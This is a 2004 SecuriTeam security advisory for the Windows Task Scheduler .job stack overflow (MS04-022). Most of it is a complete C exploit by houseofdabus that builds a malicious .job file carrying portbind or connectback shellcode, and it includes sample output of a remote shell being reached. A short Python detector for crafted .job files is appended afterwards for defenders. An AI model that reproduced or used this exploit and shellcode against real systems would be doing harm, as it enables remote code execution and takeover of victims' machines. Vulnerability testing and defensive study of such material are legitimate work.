[EXPL] Microsoft Windows XP Task Scheduler Universal Exploit (MS04-022)

From: SecuriTeam (support_at_securiteam.com)
Date: 08/04/04

    To: list@securiteam.com
    Date: 4 Aug 2004 00:53:21 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Microsoft Windows XP Task Scheduler Universal Exploit (MS04-022)
    ------------------------------------------------------------------------

    SUMMARY

    As we reported in <http://www.securiteam.com/windowsntfocus/5XP0E15DGK.html>
    (Microsoft Windows Task Scheduler '.job' Stack Overflow), a remote code
    execution vulnerability exists in the Microsoft Windows Task Scheduler
    because of the way that it handles application name validation.

    The following exploit code can be used to test your system for the
    mentioned vulnerability.

    DETAILS

    Affected Software:
     * Microsoft Windows 2000 Service Pack 2, Microsoft Windows 2000 Service Pack 3, Microsoft Windows 2000 Service Pack 4
     * Microsoft Windows XP and Microsoft Windows XP Service Pack 1
     * Microsoft Windows XP 64-Bit Edition Service Pack 1

    Exploit
    --------------------------------- Begin Code: HOD-ms04022-task-expl.c ---------------------------------
    /* HOD-ms04022-task-expl.c:
     *
     * (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
     *
     * Exploit version 0.1 coded by
     *
     *
     * .::[ houseofdabus ]::.
     *
     *
     * [at inbox dot ru]
     * -------------------------------------------------------------------
     * Tested on:
     * - Internet Explorer 6.0 (SP1) (iexplore.exe)
     * - Explorer (explorer.exe)
     * - Windows XP SP0, SP1
     *
     * -------------------------------------------------------------------
     * Compile:
     * Win32/VC++ : cl HOD-ms04022-task-expl.c
     * Win32/cygwin: gcc HOD-ms04022-task-expl.c -lws2_32.lib
     * Linux : gcc -o HOD-ms04022-task-expl HOD-ms04022-task-expl.c
     *
     * -------------------------------------------------------------------
     * Command Line Parameters/Arguments:
     *
     * HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP]
     *
     * Shellcode:
     * 1 - Portbind shellcode
     * 2 - Connectback shellcode
     *
     * -------------------------------------------------------------------
     * Example:
     *
     * C:\>HOD-ms04022-task-expl.exe expl.job 1 7777
     *
     * (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
     *
     * --- Coded by .::[ houseofdabus ]::. ---
     *
     * [*] Shellcode: Portbind, port = 7777
     * [*] Generate file: expl.job
     *
     * C:\>
     *
     * start IE -> C:\
     *
     * C:\>telnet localhost 7777
     * Microsoft Windows XP [Версия 5.1.2600]
     * (С) Корпорация Майкрософт, 1985-2001.
     *
     * C:\Documents and Settings\v.X\Рабочий стол>
     *
     * -------------------------------------------------------------------
     *
     * This is provided as proof-of-concept code only for educational
     * purposes and testing by authorized individuals with permission to
     * do so.
     *
     */
     
    /* #define _WIN32 */
     
    #include <stdio.h>
    #include <stdlib.h>
     
    #ifdef _WIN32
    #pragma comment(lib,"ws2_32")
    #include <winsock2.h>
     
    #else
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>   /* inet_addr(), htons() on Linux */
    #include <sys/socket.h>
    #endif
     
     
     
    unsigned char jobfile[] =
     
    /* job header */
    "\x01\x05\x01\x00\xD9\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
    "\xFF\xFF\xFF\xFF\x46\x00\x92\x00\x00\x00\x00\x00\x3C\x00\x0A\x00"
    "\x20\x00\x00\x00\x00\x14\x73\x0F\x00\x00\x00\x00\x03\x13\x04\x00"
    "\xC0\x00\x80\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00"
     
    /* length */
    "\x11\x11"
     
    /* garbage C:\... */
    /* unicode */
    "\x43\x00\x3A\x00\x5C\x00\x61\x00"
    "\x2E\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
    "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
     
    "\x1E\x82\xDC\x77"
     
    /* 0x77dc821e - pop reg, pop reg, ret (advapi32.dll) */
    /* for Win2k use jmp ebx or call ebx */
     
    "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
    "\x80\x31\x31\x80" /* generate exception */
     
    "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
    "\x90\x90";
     
     
     
    /* portbind shellcode */
    unsigned char portbindsc[] =
    "\x90\x90"
    "\x90\x90\xEB\x06" /* overwrite SEH-frame */
    "\x90\x90"
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90"
     
    "\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
    "\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
    "\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
    "\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
    "\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
    "\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
    "\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
    "\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
    "\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
    "\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70"
    "\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6"
    "\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e"
    "\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83"
    "\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32"
    "\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59"
    "\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50"
    "\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50"
    "\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14"
    "\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc"
    "\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c"
    "\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33"
    "\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44"
    "\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d"
    "\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50"
    "\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55"
    "\x28\xff\x55\x0c";
     
     
     
    /* connectback shellcode */
    unsigned char connectbacksc[] =
    "\x90\x90"
    "\x90\x90\xEB\x06" /* overwrite SEH-frame */
    "\x90\x90"
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90"
     
    "\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
    "\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
    "\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
    "\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
    "\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
    "\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
    "\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
    "\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
    "\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
    "\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa"
    "\x60\xcb\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02"
    "\xeb\x05\xe8\xf9\xff\xff\xff\x5e\xe8\x45\xff\xff\xff\x8b\xd0\x83"
    "\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10\xe8\xa5\xff\xff\xff\x83"
    "\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x8b\xdc"
    "\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8"
    "\x01\x63\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90"
    "\x01\x2b\xe0\x54\x83\xc0\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50"
    "\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0\x68\x7f\x01\x01\x01\xb8"
    "\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50\x53\x56"
    "\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa"
    "\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab"
    "\x5f\x33\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50"
    "\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff"
    "\x77\x38\xff\x55\x20\xff\x55\x0c";
     
     
     
    /* use this form
    unsigned char sc[] =
    "\x90\x90"
    "\x90\x90\xEB\x06" - overwrite SEH-frame
    "\x90\x90"
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90"
     
    "... code ...";
    */
     
    unsigned char endofjob[] = "\x00\x00\x00\x00";
     
    #define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+300+16)) = (port)
    #define SET_CONNECTBACK_IP(buf, ip) *(unsigned long *)(((buf)+283+16)) = (ip)
    #define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+290+16)) = (port)
     
    void
    usage(char *prog)
    {
            printf("Usage:\n");
            printf("%s <file> <shellcode> <bind/connectback port> [connectback IP]\n", prog);
            printf("\nShellcode:\n");
            printf(" 1 - Portbind shellcode\n");
            printf(" 2 - Connectback shellcode\n\n");
            exit(0);
    }
     
    int
    main(int argc, char **argv)
    {
            unsigned short strlen;
            unsigned short port;
            unsigned long ip, sc;
            FILE *fp, *fp2;
     
            printf("\n(MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit\n\n");
            printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");
     
            if (argc < 4) usage(argv[0]);
     
            sc = atoi(argv[2]);
            if ( ((sc == 2) && (argc < 5)) || (sc > 2)) usage(argv[0]);
     
            fp = fopen(argv[1], "wb");
            if (fp == NULL) {
                    printf("[-] error: can\'t create file: %s\n", argv[1]);
                    exit(0);
            }
     
            /* header & garbage */
            fwrite(jobfile, 1, sizeof(jobfile)-1, fp);
            fseek(fp, 39*16, SEEK_SET);
     
            port = atoi(argv[3]);
            printf("[*] Shellcode: ");
            if (sc == 1) {
                    SET_PORTBIND_PORT(portbindsc, htons(port));
                    printf("Portbind, port = %u\n", port);
                    fwrite(portbindsc, 1, sizeof(portbindsc)-1, fp);
                    fwrite(endofjob, 1, 4, fp);
                    fseek(fp, 70, SEEK_SET);
                    /* calculate length (see header) */
                    strlen = (sizeof(jobfile)-1-71+sizeof(portbindsc)-1+4)/2;
            }
            else {
                    ip = inet_addr(argv[4]);
                    SET_CONNECTBACK_IP(connectbacksc, ip);
                    SET_CONNECTBACK_PORT(connectbacksc, htons(port));
                    printf("Connectback, port = %u, IP = %s\n", port, argv[4]);
                    fwrite(connectbacksc, 1, sizeof(connectbacksc)-1, fp);
                    fwrite(endofjob, 1, 4, fp);
                    fseek(fp, 70, SEEK_SET);
                    /* calculate length (see header) */
                    strlen = (sizeof(jobfile)-1-71+sizeof(connectbacksc)-1+4)/2;
            }
     
            printf("[*] Generate file: %s\n", argv[1]);
            fwrite(&strlen, 1, 2, fp);
            fclose(fp);
     
            return 0;
    }
    ---------------------------------- End Code: HOD-ms04022-task-expl.c ----------------------------------
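    For defenders who want to check '.job' files for the oversized application name this advisory describes, here is an added Python example; it is not part of the advisory or of houseofdabus's code. It parses the fixed-length .job header (field layout per the MS-TSCH specification, matching the header bytes in the exploit above: App Name Len Offset at byte 20, Trigger Offset at byte 22) and flags an Application Name declared longer than MAX_PATH, one that runs past the end of the file, or a trigger section that overlaps it; the 260-character threshold is a heuristic assumption and both sample files are constructed fixtures.

```python
import struct

FIXDLEN_DATA = 68   # size of the fixed-length section of a .job file (MS-TSCH layout)
MAX_PATH = 260      # Windows path limit; longer Application Names are flagged (heuristic assumption)

def parse_job(data: bytes) -> dict:
    """Parse the .job fixed header and the Application Name string that follows it."""
    if len(data) < FIXDLEN_DATA + 4:
        raise ValueError("too short for a .job header")
    product_ver, file_ver = struct.unpack_from("<HH", data, 0)
    # Offsets 20..23 hold App Name Len Offset and Trigger Offset (little-endian WORDs)
    app_off, trig_off = struct.unpack_from("<HH", data, 20)
    if app_off + 2 > len(data):
        raise ValueError("Application Name offset points past end of file")
    (chars,) = struct.unpack_from("<H", data, app_off)  # length in UTF-16 code units
    start, end = app_off + 2, app_off + 2 + chars * 2
    name = data[start:min(end, len(data))].decode("utf-16-le", "replace").rstrip("\x00")
    return {"product_version": product_ver, "file_version": file_ver,
            "app_name_offset": app_off, "trigger_offset": trig_off,
            "app_name_chars": chars, "app_name": name, "truncated": end > len(data)}

def suspicious_reasons(data: bytes) -> list:
    """Reasons a .job file looks crafted to overflow the application-name buffer; [] if none."""
    h = parse_job(data)
    reasons = []
    if h["app_name_chars"] > MAX_PATH:
        reasons.append(f"Application Name declares {h['app_name_chars']} chars (> MAX_PATH)")
    if h["truncated"]:
        reasons.append("declared Application Name runs past end of file")
    name_end = h["app_name_offset"] + 2 + h["app_name_chars"] * 2
    if h["trigger_offset"] and h["trigger_offset"] < name_end:
        reasons.append("trigger section overlaps the Application Name")
    return reasons

def make_job(app_name: str) -> bytes:
    """Build a minimal .job file as a test fixture (constructed; not a real Scheduler export)."""
    hdr = struct.pack("<HH16sHH", 0x0501, 1, b"\x00" * 16, FIXDLEN_DATA + 2, 0)
    hdr += b"\x00" * (FIXDLEN_DATA - len(hdr))  # remaining fixed fields zeroed
    hdr += b"\x00\x00"                          # Running Instance Count
    body = app_name.encode("utf-16-le") + b"\x00\x00"
    return hdr + struct.pack("<H", len(app_name) + 1) + body

BENIGN = make_job(r"C:\Windows\system32\notepad.exe")
CRAFTED = make_job("C:\\" + "A" * 400)  # constructed: oversized name only, carries no payload

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("crafted", CRAFTED)):
        print(label, suspicious_reasons(blob) or "ok")
```

    Run it over files from %SystemRoot%\Tasks to triage them; a genuine task never declares an application name anywhere near MAX_PATH, so any hit deserves a closer look.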

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:houseofdabus@inbox.ru>
    houseofdabus HOD.


